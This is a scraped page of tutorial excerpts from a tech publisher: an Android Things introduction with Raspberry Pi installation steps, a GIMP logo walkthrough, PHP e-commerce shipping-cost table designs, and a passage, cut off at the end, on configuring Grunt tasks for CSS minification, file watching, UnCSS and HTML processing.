In this article by Charbel Nemnom, author of the book Getting Started with Nano Server, we will cover following topics: Internet of things overview Internet of Things components Android Things overview Things support library Android Things board compatibility How to install Android Things on Raspberry Creating the first Android Things project (For more resources related to this topic, see here.) Internet of things overview Internet of things, or briefly IoT, is one of the most promising trends in technology. According to many analysts, Internet of things can be the most disruptive technology in the upcoming decade. It will have a huge impact on our lives and it promises to modify our habits. IoT is and will be in the future a pervasive technology that will span its effects across many sectors: Industry Healthcare Transportation Manufacturing Agriculture Retail Smart cities All these areas will have benefits using IoT. Before diving into IoT projects, it is important to know what Internet of things means. There are several definitions about Internet of things addressing different aspects considering different areas of application. Anyway, it is important to underline that IoT is much more than a network of smartphones, tablets, and PCs connected to each other. Briefly, IoT is an ecosystem where objects are interconnected and, at the same time, they connect to the internet. Internet of things includes every object that can potentially connect to the internet and exchange data and information. These objects are connected always, anytime, anywhere, and they exchange data. The concept of connected objects is not new and over the years it has been developed. The level of circuit miniaturization and the increasing power of CPU with a lower consumption makes it possible to imagine a future where there are millions of “things” that talk each other. The first time that Internet of things was officially recognized was in 2005. International Communication Union (ITU) in a report titled The Internet of Things (https://www.itu.int/osg/spu/publications/internetofthings/InternetofThings_summar y.pdf), gave the first definition: “A new dimension has been added to the world of information and communication technologies (ICTs): from anytime, any place connectivity for anyone, we will now have connectivity for anything…. Connections will multiply and create an entirely new dynamic network of networks – an Internet of Things” In other words, IoT is a network of smart objects (or things) that can receive and send data and we can control it remotely. Internet of Things components There are several elements that contribute to creating the IoT ecosystem and it is important to know clearly the role they play in order to have a clear picture about IoT. This will be useful to better understand the projects we will build using Android Things. The basic brick of IoT is a smart object. It is a device that connects to the internet and it is capable of exchanging data. It can be a simple sensor that measures a quantity such as pressure, temperature, and so on or a complex system. Extending this concept, our oven, our coffee machine, our washing machine are examples of smart objects once they connect to the internet. All of these smart objects contribute to developing the internet of things network. Anyway, not only household appliances are examples of smart objects, but cars, buildings, actuators, and so on can be included in the list. We can reference these objects, when connected, using a unique identifier and start talking to it. At the low level, these devices exchange data using a network layer. The most important and known protocols at the base of Internet of things are: Wi-Fi Bluetooth Zigbee Cellular Network NB-IoT LoRA From an application point of view, there are several application protocols widely used in the internet of things. Some protocols derive from different contexts (such as the web) others are IoT-specific. To name a few of them, we can remember: HTTP MQTT CoAP AMQP Rest XMPP Stomp By now, they could be just names or empty boxes, but throughout this article we will explore how to use these protocols with Android Things. Prototyping boards play an important role in Internet of things and they help to develop the number of connected objects. Using prototyping boards, we can experiment IoT projects and in this article, we will explore how to build and test IoT projects using boards compatible with Android Things. As you may already know, there are several prototyping boards available on the market, each one having specific features. Just to name a few of them, we can list: Arduino (in different flavors) Raspberry Pi (in different flavors) Intel Edison ESP8266 NXP We will focus our attention on Raspberry Pi 3 and Intel Edison because Android Things supports officially these two boards. We will also use other developments boards so that you can understand how to integrate them. Android Things overview Android Things is the new operating system developed by Google to build IoT projects. This helps you to develop professional applications using trusted platforms and Android. Yes Android, because Android Things is a modified version of Android and we can reuse our Android knowledge to implement smart Internet of things projects. This OS has great potential because Android developers can smoothly move to IoT and start developing and building projects in a few days. Before diving into Android Things, it is important to have an overview. Android Things OS has the layer structure shown in the following diagram: This structure is slightly different from Android OS because it is much more compact so that apps for Android Things have fewer layers beneath and they are closer to drivers and peripherals than normal Android apps. Even if Android Things derives from Android, there are some APIs available in Android not supported in Android Things. We will now briefly describe the similarities and the differences. Let us start with the content providers, widely used in Android, and not present in Android Things SDK. Therefore, we should pay attention when we develop an Android Things app. To have more information about these content providers not supported, please refer to the Official Android Things website https://developer.android.com/things/sdk/index.html. Moreover, like a normal Android app, an Android Things app can have a User Interface (UI), even if this is optional and it depends on the type of application we are developing. A user can interact with the UI to trigger events as they happen in an Android app. From this point of view, as we will see later, the developing process of a UI is the same used in Android. This is an interesting feature because we can develop an IoT UI easily and fast re- using our Android knowledge. It is worth noticing that Android Things fits perfectly in the Google services. Almost all cloud services implemented by Google are available in Android Things with some exceptions. Android Things does not support Google services strictly connected to the mobile world and those that require a user input or authentication. Do not forget that user interface for an Android Things app is optional. To have a detailed list of Google services available in Android Things refer to the Official page (https://developer.android.com/things/sdk/index.html). An important Android aspect is the permission management. An Android app runs in a sandbox with limited access to the resources. When an app needs to access a specific resource outside the sandbox it has to request the permission. In an Android app, this happens in the Manifest.xml file. This is still true in Android Things and all the permissions requested by the app are granted at installation time. Android 6 (API level 23) has introduced a new way to request a permission. An app can request a permission not only at installation time (using the Manifest.xml file), but at runtime too. Android Things does not support this new feature, so we have to request all the permissions in the Manifest file. The last thing to notice is the notifications. As we will see later, Android Things UI does not support the notification status bar, so we cannot trigger notifications from our Android Things apps. To make things simpler, you should remember that all the services related to the user interface or that require a user interface to accomplish the task are not guaranteed to work in Android Things. Things support library Things support library is the new library developed by Google to handle the communication with peripherals and drivers. This is a completely new library not present in the Android SDK and this library is one of the most important features. It exposes a set of Java Interface and classes (APIs) that we can use to connect and exchange data with external devices such as sensors, actuators, and so on. This library hides the inner communication details supporting several industry standard protocols as: GPIO I2C PWM SPI UART Moreover, this library exposes a set of APIs to create and register new device drivers called user drivers. These drivers are custom components deployed with the Android Things app that extends the Android Things framework. In other words, they are custom libraries that enable an app to communicate with other device types not supported by Android Things natively. This article will guide you, step by step, to know how to build real-life projects using Android. You will explore the new Android Things APIs and how to use them. In the next sections, you will learn how to install Android Things on Raspberry Pi 3 and Intel Edison. Android Things board compatibility Android Things is a new operating system specifically built for IoT. At the time of writing, Android Things supported four different development boards: Raspberry Pi 3 Model B Intel Edison NXP Pico i.MX6UL Intel Joule 570x In the near future, more boards will be added to the list. Google has already announced that it will support this new board: NXP Argon i.MX6UL The article will focus on using the first two boards: Raspberry Pi 3 and Intel Edison. Anyway, you can develop. This is the power of Android Things: it abstracts the underlying hardware providing a common way to interact with peripherals and devices. The paradigm that made Java famous, Write Once and Run Anywhere (WORA), applies to Android Things too. This is a winning feature of Android Things because we can develop an Android Things app without worrying about the underlying board. Anyway, when we develop an IoT app there are some minor aspects we should consider so that our app will be portable to other compatible boards. How to install Android Things on Raspberry Raspberry Pi 3 is the latest board developed by Raspberry. It is an upgrade of Raspberry Pi 2 Model B and respect to its predecessor it has some great features: Quad-core ARMv8 Cpu at 1.2Ghz Wireless Lan 802.11n Bluetooth 4.0 The below screenshot shows a Raspberry Pi 3 Model B: In this section, you will learn how to install Android Things on Raspberry Pi 3 using a Windows PC or a Mac OS X. Before starting the installation process you must have: Raspberry Pi 3 Model B At least 8Gb SD card A USB cable to connect Raspberry to your PC An HDMI cable to connect Raspberry to a TV/monitor (optional) If you do not have an HDMI cable you can use a screen mirroring tool. This is useful to know the result of the installation process and when we will develop the Android Things UIs. The installation steps are different if you are using Windows, OS X or Linux. How to install Android Things using Windows At the beginning we will cover how to install Android Things on Raspberry Pi 3 using a Windows PC: Download the Android Things image from this link: https://developer.android.com/things/preview/download.html. Select the right image, in this case, you have to choose the Raspberry Pi image. Accept the license and wait until the download is completed. Once the download is complete, extract the zip file. To install the image on the SD card, there is a great application called Win32 Disk Imager that works perfectly. It is free and you can download it from SourceForge using this link: https://sourceforge.net/projects/win32diskimager/. At the time of writing, the application version is 0.9.5. After you downloaded it, you have to run the installation executable as Administrator. Now you are ready to burn the image into the SD card. Insert the SD card into your PC. Select the image you have unzipped at step 3 and be sure to select the right disk name (your SD). At the end click on Write. You are done! The image is installed on the SD card and we can now start Raspberry Pi. How to install Android Things using OS X If you have a Mac OS X, the steps to install Android Things are slightly different. There are several options to flash this OS to the SD card, you will learn the fastest and easiest one. These are the steps to follow: Format your SD card using FAT32. Insert your SD card into your Mac and run Disk Utility. You should see something like it: Download the Android Things OS image using this link: https://developer.android.com/things/preview/download.html. Unzip the file you have downloaded. Insert the SD card into your Mac. Now it is time to copy the image to the SD card. Open a terminal window and write: sudo dd bs=1m if=path_of_your_image.img of=/dev/rdiskn Where the path_to_your_image is the path to the file with img extension you downloaded at step 2. In order to find out the rdiskn you have to select Preferences and then System Report. The result is shown in the picture below: The BSD name is the disk name we are looking for. In this case, we have to write: sudo dd bs=1m if=path_of_your_image.img of=/dev/disk1 That's all. You have to wait until the image is copied into the SD card. Do not forget that the copying process could take a while. So be patient! Creating the first Android Things project Considering that Android Things derives from Android, the development process and the app structure are the same we use in a common Android app. For this reason, the development tool to use for Android Things is Android studio. If you have already used Android studio in the past, reading this paragraph you will discover the main differences between an Android Things app and Android app. Otherwise, if you are new to Android development, this paragraph will guide you step by step to create your first Android Things app. Android Studio is the official development environment to develop Android Things apps, therefore, before starting, it is necessary you have installed it. If not, go to https://developer.android.com/studio/index.html, download and install it. The development environment must adhere to these prerequisites: SDK tools version 24 or higher. Update the SDK with Android 7 (API level 24) Android Studio 2.2 or higher If your environment does not meet the previous conditions, you have to update your Android Studio using the Update manager. Now there are two alternatives to starting a new project: Cloning a template project from Github and import it into Android Studio Create a new Android project in Android Studio To better understand the main differences between Android and Android Things you should follow option number 2, at least the first time. Cloning the template project This is the fastest path because with a few steps you are ready to develop an Android Things app: go to https://github.com/androidthings/new-project-template and clone the repository. Open a terminal and write: git clone https://github.com/androidthings/new-project-template.git Now you have to import the cloned project into Android Studio. Create the project manually This step is a quite longer respect to the previous option but it is useful to know the main differences between these two worlds. Create a new Android project. Do not forget to set the Minimum SDK to API Level 24: By now, you should create a project with empty activity. Confirm and create the new project. There are some steps you have to follow before your Android app project turns into an Android Things app project: Open Gradle scripts folder and modify build.gradle (app-level) and replace the dependency directive with the following lines: dependencies { provided 'com.google.android.things:androidthings:0.2-devpreview' } Open res folder and remove all the files under it except strings.xml. Open Manifest.xml and remove android: theme attribute in application tag. In the Manifest.xmladd the following line inside application tag: <uses-library android_name="com.google.android.things"/> In the layout folder open all the layout files created automatically and remove the references to values. In the Activity created by default (MainActivity.java) remove this line: import android.support.v7.app.AppCompatActivity; Replace AppCompatActivity with Activity. Under the folder java remove all the folders except the one with your package name. That's all. You have now transformed an Android app project into an Android Things app project. Compiling the code you will have no errors. For the next times, you can simply clone the repository holding the project template and start coding. Differences between Android and Android Things As you can notice an Android Things project is very similar to an Android project. We have always Activities, layouts, gradle files and so on. At the same time, there are some differences: Android Things does not use multiple layouts to support different screen sizes. So when we develop an Android Things app we create only one layout Android Things does not support themes and styles. Android support libraries are not available in Android Things. Summary In this article we have covered, Internet of things overview and components, Android Things overview, Things support library, and Android Things board compatibility, and also learned how to create first Android Things project. Resources for Article: Further resources on this subject: Saying Hello to Unity and Android [article] Getting started with Android Development [article] Android Game Development with Unity3D [article]
Read more
  • 0
  • 0
  • 16037
article-image-creating-quick-logo-company-gimp-26
Packt
06 Apr 2011
3 min read
Save for later

Creating a quick logo for a company with GIMP 2.6

Packt
06 Apr 2011
3 min read
How to do it... We can go about creating our logo by carrying out the following steps: In a new file, using the Text Tool, write the name of the company. Pick a font, its size, and place it a little above the middle of the canvas. Lock the layer by selecting it and clicking in the Lock checkbox to avoid accidentally making changes to it: Create a new gradient by clicking on the + button at the bottom of the Gradients dialog. If it is not enabled, call it by using Ctrl + G, or go to Windows | Dockable Dialogs | Gradients: To pick the colors for the gradient, position the mouse over the the orange bar (blue in Windows) and right-click: Select the Left Endpoint's Color: And/or the Right Endpoint's Color: Here are the colors I have chosen: Using the Blend Tool, apply the gradient: Right-click inside the text layer name in the Layers dialog, and select the Alpha to Selection option: Then, go to Select | Grow, and make it bigger by 3 pixels: Create a new layer and name it border. Fill it using the Bucket Fill Tool (I used a dark color), and place it underneath the text layer (drag and drop the border layer): Duplicate the border layer by clicking on the Duplicate button at the bottom of the layers dialog, or going to Layer | Duplicate Layer. Repeat this operation with the text layer. Move this last duplicated layer on top of the border copy layer. Merge these duplicated layers by going to Layer | Merge Down, and change its name to reflection: Choose Select | none from the menu to be sure there's no selection present. Using the Move Tool, place the reflection layer below the "text" layer and flip it with the Flip Tool. Use the Move Tool to adjust the position of the flipped text, and separate them vertically by just a few pixels. Right-click in the reflection layer inside the Layers dialog, and select the Add Layer Mask option. Choose the Black (Full Transparency) and click Add. Using the Blend Tool, pick the FG to BG gradient from the Gradients Dialog, and apply it from bottom to the top to create a semitransparent reflection of the text: Select the original text layer. Right-click on it in the Layers dialog, and choose Alpha to Selection. Then with the Ellipse Select Tool in subtract mode (check the following image): Draw an ellipse, as in the following image: Create a new layer and name it glass. Then, fill it with a white color using the Bucket Fill Tool: Change its opacity to something around 30 and you are done! Here's the final logo: How it works... Just by using a font you like and a few tools you quickly created a logo. See how we only used default paint/blend tools and masks to create it? GIMP has powerful extensions but you can also create professional pieces without using complex filters or even using much time. Summary This article showed us how to use a few filters to create a company logo. Further resources on this subject: Photo Manipulation with GIMP 2.6 [Article] How To Create Amazing Text and Font Effects in Gimp 2.6 [Article] Creating Pseudo-3D Imagery with GIMP [Article] Blender 2.5: Creating a UV Texture [Article] Python Graphics: Combining Raster and Vector Pictures [Article] Open Source Awards 2010: Gimp [Article]
Read more
  • 0
  • 0
  • 16015

article-image-shipping-and-tax-calculations-php-5-ecommerce
Packt
20 Jan 2010
8 min read
Save for later

Shipping and Tax Calculations with PHP 5 Ecommerce

Packt
20 Jan 2010
8 min read
Shipping Shipping is a very important aspect of an e-commerce system; without it customers will not accurately know the cost of their order. The only situation where we wouldn't want to include shipping costs is where we always offer free shipping. However, in that situation, we could either add provisions to ignore shipping costs, or we could set all values to zero, and remove references to shipping costs from the user interface. Shipping methods The first requirement to calculate shipping costs is a shipping method. We may wish to offer a number of different shipping methods to our customers, such as standard shipping, next-day shipping, International shipping, and so on. The system will require a default shipping method, so when the customer visits their basket, they see shipping costs calculated based off the default method. There should be a suitable drop-down list on the basket page containing the list of shipping methods; when this is changed, the costs in the basket should be updated to reflect the selected method. We should store the following details for each shipping method: An ID number A name for the shipping method If the shipping method is active or not, indicating if it should be selectable by customers If the shipping method is the default method for the store A default shipping cost, this would: Be pre-populated in a suitable field when creating new products; however, when the product is created through the administration interface, we would store the shipping cost for the product with the product. Automatically be assigned to existing products in a store when a new shipping method is created to a store that already contains products. This could be suitably stored in our database as the following: Field Type Description ID Integer, Primary Key, Auto Increment ID number for the shipping method Name Varchar The name of the shipping method Active Boolean Indicates if the shipping method is active Default_cost Float The default cost for products for this shipping method This can be represented in the database using the following SQL: CREATE TABLE `shipping_methods` (`ID` INT NOT NULL AUTO_INCREMENT PRIMARY KEY ,`name` VARCHAR( 50 ) NOT NULL ,`active` BOOL NOT NULL ,`is_default` BOOL NOT NULL ,`default_cost` DOUBLE NOT NULL ,INDEX ( `active` , `is_default` )) ENGINE = INNODB COMMENT = 'Shipping methods'; Shipping costs There are several different ways to calculate the costs of shipping products to customers: We could associate a cost to each product for each shipping method we have in our store We could associate costs for each shipping method to ranges of weights, and either charge the customer based on the weight-based shipping cost for each product combined, or based on the combined weight of the order We could base the cost on the customer's delivery address The exact methods used, and the way they are used, depends on the exact nature of the store, as there are implications to these methods. If we were to use location-based shipping cost calculations, then the customer would not be aware of the total cost of their order until they entered their delivery address. There are a few ways this can be avoided: the system could assume a default delivery location and associated costs, and then update the customer's delivery cost at a later stage. Alternatively, if we enabled delivery methods for different locations or countries, we could associate the appropriate costs to these methods, although this does of course rely on the customer selecting the correct shipping method for their order to be approved; appropriate notifications to the customer would be required to ensure they do select the correct ones. For this article we will implement: Weight-based shipping costs: Here the cost of shipping is based on the weight of the products. Product-based shipping costs: Here the cost of shipping is set on a per product basis for each product in the customer's basket. We will also discuss location-based shipping costs, and look at how we may implement it. To account for international or long-distance shipping, we will use varying shipping methods; perhaps we could use: Shipping within state X. Shipping outside of state X. International shipping. (This could be broken down per continent if we wanted, without imposing on the customer too much.) Product-based shipping costs Product-based shipping costs would simply require each product to have a shipping cost associated to it for each shipping method in the store. As discussed earlier, when a new method is added to an existing store, a default value will initially be used, so in theory the administrator only needs to alter products whose shipping costs shouldn't be the default cost, and when creating new products, the relevant text box for the shipping cost for that method will have the default cost pre-populated. To facilitate these costs, we need a new table in our database storing: Product IDs Shipping method IDs Shipping costs The following SQL represents this table in our database: CREATE TABLE `shipping_costs_product` (`shipping_id` int(11) NOT NULL, `product_id` int(11) NOT NULL,`cost` float NOT NULL, PRIMARY KEY (`shipping_id`,`product_id`) )ENGINE=InnoDB DEFAULT CHARSET=latin1; Weight-based shipping costs Depending on the store being operated from our framework, we may need to base shipping costs on the weights of products. If a particular courier for a particular shipping method charges based on weights, then there isn't any point in creating costs for each product for that shipping method. Our framework can calculate the shipping costs based on the weight ranges and costs for the method, and the weight of the product. Within our database we would need to store: The shipping method in question A lower bound for the product weight, so we know which cost to apply to a product A cost associated for anything between this and the next weight bound The table below illustrates these fields in our database: Field Type Description ID Integer, primary key, Auto Increment A unique reference for the weight range Shipping_id Integer The shipping method the range applies to Lower_weight Float For working out which products this weight range cost applies to Cost Float The shipping cost for a product of this weight The following SQL represents this table: CREATE TABLE `shipping_costs_weight` (`ID` int(11) NOT NULL auto_increment,`shipping_id` int(11) NOT NULL,`lower_weight` float NOT NULL,`cost` float NOT NULL,PRIMARY KEY (`ID`)) ENGINE=InnoDB DEFAULT CHARSET=latin1 AUTO_INCREMENT=1 ; To think about: Location-based shipping costs One thing we should still think about is location-based shipping costs, and how we may implement this. There are two primary ways in which we can do this: Assign shipping costs or cost surpluses/reductions to delivery addresses (either countries or states) and shipping methods Calculate costs using third-party service APIs These two methods have one issue, which is why we are not going to implement them—that is the costs are calculated later in the checkout process. We want our customers to be well informed and aware of all of their costs as early as possible. As mentioned earlier, however, we could get round this by assuming a default delivery location and providing customers with a guideline shipping cost, which would be subject to change based on their delivery address. Alternatively, we could allow customers to select their delivery location region from a drop-down list on the main "shopping basket" page. This way they would know the costs right away. Regional shipping costs We could look at storing: Shipping method IDs Region types (states or countries) Region values (an ID corresponding to a list of states or countries) A priority (in some cases, we may need to only consider the state delivery costs, and not country costs; in others cases, it may be the other way around) The associated costs changes (this could be a positive or negative value to be added to a product's delivery cost, as calculated by the other shipping systems already) By doing this, we can then combine the delivery address with the products and lookup a price alteration, which is applied to the product's delivery cost, which has already been calculated. Ideally, we would use all the shipping cost calculation systems discussed, to make something as flexible as possible, based on the needs of a particular product, particular shipping method or courier, or of a particular store or business. Third-party APIs The most accurate method of charging delivery costs, encompassing weights and delivery addresses is via APIs provided by couriers themselves, such as UPS. The following web pages may be of reference: http://www.ups.com/onlinetools http://answers.google.com/answers/threadview/id/429083.html Using such an API, means our shipping cost would be accurate, assuming our weight values were correct for our products, and we would not over or under charge customers for shipping costs. One additional consideration that third-party APIs may require would be dimensions of products, if their costs are also based on product sizes.
Read more
  • 0
  • 0
  • 16015

article-image-grunt-makes-it-easy-to-test-and-optimize-your-website-heres-how-tutorial
Sugandha Lahoti
18 Jun 2018
17 min read
Save for later

Grunt makes it easy to test and optimize your website. Here's how. [Tutorial]

Sugandha Lahoti
18 Jun 2018
17 min read
Meet Grunt, the JavaScript Task Runner. As implied by its name, Grunt is a tool that allows us to automatically run any set of tasks. Grunt can even wait while you code, pick up changes made to your source code files (CSS, HTML, or JavaScript) and then execute a pre-configured set of tasks every time you save your changes. This way, you are no longer required to manually execute a set of commands in order for the changes to take effect. In this article, we will learn how to optimize responsive web design using Grunt. Read this article about Tips and tricks to optimize your responsive web design before we get started with Grunt. This article is an excerpt from Mastering Bootstrap 4 - Second Edition by Benjamin Jakobus, and Jason Marah. Let's go ahead and install Grunt: npm install grunt Before we can start using run with MyPhoto, we need to tell Grunt: What tasks to run, that is, what to do with the input (the input being our MyPhoto files) and where to save the output What software is to be used to execute the tasks How to name the tasks so that we can invoke them when required With this in mind, we create a new JavaScript file (assuming UTF-8 encoding), called Gruntfile.js, inside our project root. We will also need to create a JSON file, called package.json, inside our project root. Our project folder should have the following structure (note how we created one additional folder, src, and moved our source code and development assets inside it): src |__bower_components |__images |__js |__styles |__index.html Gruntfile.js package.json Open the newly created Gruntfile.js and insert the following function definition: module.exports = function(grunt) { grunt.initConfig({ pkg: grunt.file.readJSON("package.json") }); }; As you can see, this is plain, vanilla JavaScript. Anything that we need to make Grunt aware of (such as the Grunt configuration) will go inside the grunt.initConfig function definition. Adding the configuration outside the scope of this function will cause Grunt to ignore it. Now open package.json and insert the following: { "name": "MyPhoto", "version": "0.1.0", "devDependencies": { } } The preceding code should be self-explanatory. The name property refers to the project name, version refers to the project's version, and devDependencies refers to any dependencies that are required (we will be adding to those in a while). Great, now we are ready to start using Grunt! Minification and concatenation using Grunt The first thing that we want Grunt to be able to do is minify our files. Yes, we already have minifier installed, but remember that we want to use Grunt so that we can automatically execute a bunch of tasks (such as minification) in one go. To do so, we will need to install the grunt-contrib-cssmin package (a Grunt package that performs minification and concatenation. Visit https://github.com/gruntjs/grunt-contrib-cssmin for more information.): npm install grunt-contrib-cssmin --save-dev Once installed, inspect package.json. Observe how it has been modified to include the newly installed package as a development dependency: { "name": "MyPhoto", "version": "0.1.0", "devDependencies": { "grunt": "^0.4.5", "grunt-contrib-cssmin": "^0.14.0" } } We must tell Grunt about the plugin. To do so, insert the following line inside the function definition within our Gruntfile.js: grunt.loadNpmTasks("grunt-contrib-cssmin"); Our Gruntfile.js should now look as follows: module.exports = function(grunt) { grunt.initConfig({ pkg: grunt.file.readJSON("package.json") }); grunt.loadNpmTasks("grunt-contrib-cssmin"); }; As such, we still cannot do much. The preceding code makes Grunt aware of the grunt-contrib-cssmin package (that is, it tells Grunt to load it). In order to be able to use the package to minify our files, we need to create a Grunt task. We need to call this task cssmin: module.exports = function(grunt) { grunt.initConfig({ pkg: grunt.file.readJSON("package.json"), "cssmin": { "target": { "files": { "dist/styles/myphoto.min.css": [ "styles/*.css", "!styles/myphoto-hcm.css" ] } } } }); grunt.loadNpmTasks("grunt-contrib-cssmin"); }; Whoa! That's a lot of code at once. What just happened here? Well, we registered a new task called cssmin. We then specified the target, that is, the input files that Grunt should use for this task. Specifically, we wrote this: "src/styles/myphoto.min.css": ["src/styles/*.css"] The name property here is being interpreted as denoting the output, while the value property represents the input. Therefore, in essence, we are saying something along the lines of "In order to produce myphoto.min.css, use the files a11yhcm.css, alert.css, carousel.css, and myphoto.css". Go ahead and run the Grunt task by typing as follows: grunt cssmin Upon completion, you should see output along the lines of the following: Figure 8.1: The console output after running cssmin The first line indicates that a new output file (myphoto.min.css) has been created and that it is 3.25 kB in size (down from the original 4.99 kB). The second line is self-explanatory, that is, the task executed successfully without any errors. Now that you know how to use grunt-contrib-cssmin, go ahead and take a look at the documentation for some nice extras! Running tasks automatically Now that we know how to configure and use Grunt to minify our style sheets, let's turn our attention to task automation, that is, how we can execute our Grunt minification task automatically as soon as we make changes to our source files. To this end, we will learn about a second Grunt package, called grunt-contrib-watch (https://github.com/gruntjs/grunt-contrib-watch). As with contrib-css-min, this package can be installed using npm: npm install grunt-contrib-watch --save-dev Open package.json and verify that grunt-contrib-watch has been added as a dependency: { "name": "MyPhoto", "version": "0.1.0", "devDependencies": { "grunt": "^0.4.5", "grunt-contrib-cssmin": "^0.14.0", "grunt-contrib-watch": "^0.6.1" } } Next, tell Grunt about our new package by adding grunt.loadNpmTasks('grunt-contrib-watch'); to Gruntfile.js. Furthermore, we need to define the watch task by adding a new empty property called watch: module.exports = function(grunt) { grunt.initConfig({ pkg: grunt.file.readJSON("package.json"), "cssmin": { "target":{ "files": { "src/styles/myphoto.min.css": ["src/styles/*.css", "src/styles!*.min.css"] } } }, "watch": { } }); grunt.loadNpmTasks("grunt-contrib-cssmin"); grunt.loadNpmTasks("grunt-contrib-watch"); }; Now that Grunt loads our newly installed watch package, we can execute the grunt watch command. However, as we have not yet configured the task, Grunt will terminate with the following: Figure 8.2: The console output after running the watch task The first thing that we need to do is tell our watch task what files to actually "watch". We do this by setting the files property, just as we did with grunt-contrib-cssmin: "watch": { "target": { "files": ["src/styles/myphoto.css"], } } This tells the watch task to use the myphoto.css located within our src/styles folder as input (it will only watch for changes made to myphoto.css). Even better, we can watch all files: "watch": { "target": { "files": [ "styles/*.css", "!styles/myphoto-hcm.css" ], } } In reality, you would want to be watching all CSS files inside styles/; however, to keep things simple, let's just watch myphoto.css. Go ahead and execute grunt watch again. Unlike the first time that we ran the command, the task should not terminate now. Instead, it should halt with the Waiting... message. Go ahead and make a trivial change (such as removing a white space) to our myphoto.css file. Then, save this change. Note what the terminal output is now: Figure 8.3: The console output after running the watch task Great! Our watch task is now successfully listening for file changes made to any style sheet within src/styles. The next step is to put this achievement to good use, that is, we need to get our watch task to execute the minification task that we created in the previous section. To do so, simply add the tasks property to our target: "watch": { "target": { "files": [ "styles/*.css", "!styles/myphoto-hcm.css" ], "tasks": ["cssmin"] } } Once again, run grunt watch. This time, make a visible change to our myphoto.css style sheet. For example, you can add an obvious rule such as body {background-color: red;}. Observe how, as you save your changes, our watch task now runs our cssmin task: Figure 8.4: The console output after making a change to the style sheet that is being watched Refresh the page in your browser and observe the changes. Voilà! We now no longer need to run our minifier manually every time we change our style sheet. Stripping our website of unused CSS Dead code is never good. As such, whatever the project that you are working on maybe, you should always strive to eliminate code that is no longer in use, as early as possible. This is especially important when developing websites, as unused code will inevitably be transferred to the client and hence result in additional, unnecessary bytes being transferred (although maintainability is also a major concern). Programmers are not perfect, and we all make mistakes. As such, unused code or style rules are bound to slip past us during development and testing. Consequently, it would be nice if we could establish a safeguard to ensure that at least no unused style makes it past us into production. This is where grunt-uncss fits in. Visit https://github.com/addyosmani/grunt-uncss for more. UnCSS strips any unused CSS from our style sheet. When configured properly, it can, therefore, be very useful to ensure that our production-ready website is as small as possible. Let's go ahead and install UnCSS: npm install grunt-uncss -save-dev Once installed, we need to tell Grunt about our plugin. Just as in the previous subsections, update the Gruntfile.js by adding the grunt.loadNpmTasks('grunt-uncss'); line to our Grunt configuration. Next, go ahead and define the uncss task: "uncss": { "target": { "files": { "src/styles/output.css": ["src/index.html"] } } }, In the preceding code, we specified a target consisting of the index.html file. This index.html will be parsed by Uncss. The class and id names used within it will be compared to those appearing in our style sheets. Should our style sheets contain selectors that are unused, then those are removed from the output. The output itself will be written to src/styles/output.css. Let's go ahead and test this. Add a new style to our myphoto.css that will not be used anywhere within our index.html. Consider this example: #foobar { color: red; } Save and then run this: grunt uncss Upon successful execution, the terminal should display output along the lines of this: Figure 8.5: The console output after executing our uncss task Go ahead and open the generated output.css file. The file will contain a concatenation of all of our CSS files (including Bootstrap). Go ahead and search for #foobar. Find it? That's because UnCSS detected that it was no longer in use and removed it for us. Now, we successfully configured a Grunt task to strip our website of the unused CSS. However, we need to run this task manually. Would it not be nice if we could configure the task to run with the other watch tasks? If we were to do this, the first thing that we would need to ask ourselves is how do we combine the CSS minification task with UnCSS? After all, grunt watch would run one before the other. As such, we would be required to use the output of one task as input for the other. So how would we go about doing this? Well, we know that our cssmin task writes its output to myphoto.min.css. We also know that index.html references myphoto.min.css. Furthermore, we also know uncss receives its input by checking the style sheets referenced in index.html. Therefore, we know that the output produced by our cssmin task is sure to be used by our uncss as long as it is referenced within index.html. In order for the output produced by uncss to take effect, we will need to reconfigure the task to write its output into myphoto.min.css. We will then need to add uncss to our list of watch tasks, taking care to insert the task into the list after cssmin. However, this leads to a problem—running uncss after cssmin will produce an un-minified style sheet. Furthermore, it also requires the presence of myphoto.min.css. However, as myphoto.min.css is actually produced by cssmin, the sheet will not be present when running the task for the first time. Therefore, we need a different approach. We will need to use the original myphoto.css as input to uncss, which then writes its output into a file called myphoto.min.css. Our cssmin task then uses this file as input, minifying it as discussed earlier. Since uncss parses the style sheet references in index.html, we will need to first revert our index.html to reference our development style sheet, myphoto.css. Go ahead and do just that. Replace the <link rel="stylesheet" href="styles/myphoto.min.css" /> line with <link rel="stylesheet" href="styles/myphoto.css" />. Processing HTML For the minified changes to take effect, we now need a tool that replaces our style sheet references with our production-ready style sheets. Meet grunt-processhtml. Visit https://www.npmjs.com/package/grunt-processhtml for more. Go ahead and install it using the following command: npm install grunt-processhtml --save-dev Add grunt.loadNpmTasks('grunt-processhtml'); to our Gruntfile.js to enable our freshly installed tool. While grunt-processhtml is very powerful, we will only cover how to replace style sheet references. Therefore, we recommend that you read the tool's documentation to discover further features. In order to replace our style sheets with myphoto.min.css, we wrap them inside special grunt-processhtml comments: <!-- build:css styles/myphoto.min.css --> <link rel="stylesheet" href="bower_components/bootstrap/ dist/css/bootstrap.min.css" /> <link href='https://fonts.googleapis.com/css?family=Poiret+One' rel='stylesheet' type='text/css'> <link href='http://fonts.googleapis.com/css?family=Lato& subset=latin,latin-ext' rel='stylesheet' type='text/css'> <link rel="stylesheet" href="bower_components/Hover/css/ hover-min.css" /> <link rel="stylesheet" href="styles/myphoto.css" /> <link rel="stylesheet" href="styles/alert.css" /> <link rel="stylesheet" href="styles/carousel.css" /> <link rel="stylesheet" href="styles/a11yhcm.css" /> <link rel="stylesheet" href="bower_components/components- font-awesome/css/font-awesome.min.css" /> <link rel="stylesheet" href="bower_components/lightbox-for -bootstrap/css/bootstrap.lightbox.css" /> <link rel="stylesheet" href="bower_components/DataTables/ media/css/dataTables.bootstrap.min.css" /> <link rel="stylesheet" href="resources/animate/animate.min.css" /> <!-- /build --> Note how we reference the style sheet that is meant to replace the style sheets contained within the special comments on the first line, inside the comment: <!-- build:css styles/myphoto.min.css --> Last but not least, add the following task: "processhtml": { "dist": { "files": { "dist/index.html": ["src/index.html"] } } }, Note how the output of our processhtml task will be written to dist. Test the newly configured task through the grunt processhtml command. The task should execute without errors: Figure 8.6: The console output after executing the processhtml task Open dist/index.html and observe how, instead of the 12 link tags, we only have one: <link rel="stylesheet" href="styles/myphoto.min.css"> Next, we need to reconfigure our uncss task to write its output to myphoto.min.css. To do so, simply replace the 'src/styles/output.css' output path with 'dist/styles/myphoto.min.css' inside our Gruntfile.js (note how myphoto.min.css will now be written to dist/styles as opposed to src/styles). We then need to add uncss to our list of watch tasks, taking care to 